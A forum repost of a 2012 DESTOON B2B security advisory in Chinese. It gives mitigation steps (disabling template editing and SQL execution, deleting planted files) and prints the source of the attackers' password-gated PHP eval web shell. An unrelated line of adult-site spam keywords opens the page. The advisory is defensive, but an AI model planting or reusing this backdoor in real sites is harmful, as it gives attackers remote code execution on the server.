99精品国产综合久久久久五月天,免费观看欧美大片毛片不用播放器 ,AV无码理论片在线观看免费网站,国产精品国产成人国产三级

標(biāo)題: DESTOON B2B緊急安全公告20121010 [打印本頁(yè)]

作者: andy15703166 時(shí)間: 2012-10-11 09:52 標(biāo)題: DESTOON B2B緊急安全公告20121010

由于后臺(tái)模板管理權(quán)限過(guò)大存在安全隱患，可能導(dǎo)致部分用戶遭遇黑客攻擊，為了您的網(wǎng)站安全，請(qǐng)看到此公告之后立即做以下處理：

一、修改根目錄config.inc.php修改 $CFG['edittpl'] = '1'; 為 $CFG['edittpl'] = '0'; 禁用在線編輯模板功能，$CFG['executesql'] 也建議設(shè)置為 0 禁用后臺(tái)執(zhí)行SQL功能。3.0及以下版本用戶，請(qǐng)臨時(shí)刪除admin/template.inc.php以免遭遇攻擊。

二、檢查站點(diǎn)目錄是否存在file/swfupload/editor.php和company/link/link.php，如果存在，請(qǐng)立即刪除，注意file/swfupload/editor.inc.php為系統(tǒng)正常文件，請(qǐng)不要誤刪。

設(shè)置過(guò)偽靜態(tài)并且站點(diǎn)目錄權(quán)限設(shè)置嚴(yán)格的用戶不受此影響，請(qǐng)看到的用戶相互轉(zhuǎn)告，盡快處理。

提示：

系統(tǒng)需要設(shè)置可寫(xiě)的目錄和文件詳見(jiàn)：http://help.destoon.com/install/68.html，其他文件和目錄請(qǐng)不要設(shè)置寫(xiě)入權(quán)限。

利用Rewrite規(guī)則設(shè)置網(wǎng)站安全：http://help.destoon.com/skill/71.html

PS:
黑客上傳文件file/swfupload/editor.php 和 link.php文件源碼：

<?php if(md5($_GET['pass'])=='cfb83d29df045615c7d99d33110ef683'){eval($_POST[console]);}else{die('fuck off!');}?>

復(fù)制代碼

歡迎光臨 WDlinux官方論壇 (http://fudaan.com/bbs/)